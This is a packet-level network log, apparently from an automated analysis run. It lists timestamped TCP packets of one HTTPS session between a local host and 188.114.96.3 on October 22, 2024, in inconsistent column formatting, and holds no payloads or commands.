Oct 22, 2024 06:17:16.125551939 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.125613928 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.127937078 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.128017902 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.128036976 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.130079031 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.132213116 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.132239103 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.132280111 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.132307053 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.132333994 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.173890114 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.173949957 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.220768929 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.247133970 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.254137039 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.254673958 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.254734993 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.266659975 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.266874075 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.266904116 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.279234886 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.279261112 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.279393911 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.279457092 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.279527903 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.284260035 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.330163956 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.330223083 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.366112947 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.366298914 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.366360903 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.374877930 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.374918938 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.375097036 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.375161886 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.375221014 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.381087065 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.387204885 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.387233019 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.387480021 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.387545109 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.387624979 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.390391111 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.439536095 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.439594984 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.485114098 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.485310078 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.485371113 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.487087965 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.487262011 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.487323046 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.495373964 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.495405912 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.495452881 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.495475054 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.495548010 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.495589018 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.502826929 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.502859116 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.503015041 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.503079891 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.503146887 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.604151011 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.604168892 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.604471922 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.611135006 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.611148119 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.611217976 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.614391088 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.614401102 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.614470959 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.620382071 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.620392084 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.620465994 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.723887920 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.723906040 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.724096060 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.728355885 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.728452921 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.731445074 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.731640100 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.737607956 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.737797022 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.843836069 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.844222069 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.845674992 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.845761061 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.851108074 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.851187944 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.856339931 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.856519938 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.860121965 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.860210896 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.963361979 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.963599920 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.967854977 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.968084097 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.970804930 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.970889091 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.973910093 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.974082947 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:16.979300022 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.979480982 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.098536015 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.098782063 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.103722095 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.103926897 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.106749058 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.107141018 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.112507105 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.112596035 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.114669085 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.114865065 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.218190908 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.218410969 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.223120928 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.223304033 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.225929976 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.226144075 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.231554985 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.231731892 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.235958099 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.236140966 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.337493896 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.337677002 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.341237068 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.341413975 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.341473103 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.346309900 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.346484900 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.346545935 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.346611977 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.348865986 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.348926067 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.352927923 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.353106976 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.354964018 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.355145931 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.458596945 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.458786964 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.461961985 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:17.462023973 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:17.466511965 CEST  443  49735  188.114.96.3  192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.466573000 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.469769955 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.469834089 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.471577883 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.471640110 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.584435940 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584474087 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584595919 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584654093 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.584654093 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.584654093 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.584721088 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584769011 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584810972 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.698599100 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.698626041 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.698792934 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.698792934 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.698858976 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.698920012 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.700161934 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.700335026 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.739522934 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.739543915 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.739732981 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.739732981 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.739803076 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.739862919 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.823100090 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.823128939 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.823311090 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.823333025 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.823527098 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.936698914 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.936728954 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.936904907 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.936904907 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.936927080 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.937139988 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.941893101 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.941977024 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.941996098 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.942171097 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.190768957 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.190783024 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.190965891 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.191006899 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.191076040 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.191128969 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.191128969 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.198561907 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.198581934 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.198755026 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.198755026 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.198818922 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.198877096 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.204179049 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.204255104 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.204345942 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.204345942 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.204408884 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.204463959 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.210432053 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.210453987 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.210613012 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.210613012 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.210676908 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.210736036 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.212357998 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.212537050 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.294284105 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.294469118 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.294471025 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.294548988 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.294589996 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.298141003 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.298218966 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.298309088 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.298309088 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.298373938 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.379352093 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.379379988 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.379542112 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.379543066 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.379610062 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.416493893 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.416673899 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.416685104 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.416764975 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.416812897 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.457410097 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.457433939 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.457588911 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.457593918 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.457593918 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.457665920 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.457727909 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.499902010 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.500078917 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.535693884 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.535712957 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.535888910 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.535897970 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.535969019 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.536010981 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.536899090 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.541810036 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.541922092 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.541981936 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.542069912 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.653847933 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.653876066 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.654059887 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.654059887 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.654125929 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.654743910 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.658477068 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.658674002 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.658714056 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.658801079 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.658845901 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.659316063 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.738749027 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.738769054 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.738945007 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.738945007 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.739008904 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.739067078 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.773737907 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.773828983 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.773888111 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.773973942 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.779427052 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.779496908 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.779501915 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.779546976 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.779586077 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.779687881 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.860460043 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.860527992 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.860661030 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.860661983 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.860726118 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.860850096 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.861344099 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.896249056 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.896447897 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.896450043 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.896541119 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.896584034 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.896989107 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.936150074 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.936211109 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.936347008 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.936347008 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.936410904 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.936485052 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.012818098 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.012885094 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.013041973 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.013042927 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.013107061 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.013715029 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.019357920 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.019561052 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.019562006 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.019627094 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.019678116 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.019900084 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.097642899 CEST44349735188.114.96.3192.168.2.4
Timestamp                             Src Port  Dst Port  Source IP        Dest IP
Oct 22, 2024 06:17:19.097836971 CEST  443       49735     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:19.097840071 CEST  49735     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:19.097918987 CEST  443       49735     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:19.097959995 CEST  49735     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:19.132112980 CEST  443       49735     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:19.132177114 CEST  443       49735     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:19.132318020 CEST  49735     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:19.132318020 CEST  49735     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:19.132385969 CEST  443       49735     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:19.134046078 CEST  443       49735     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:19.134253025 CEST  443       49735     188.114.96.3     192.168.2.4
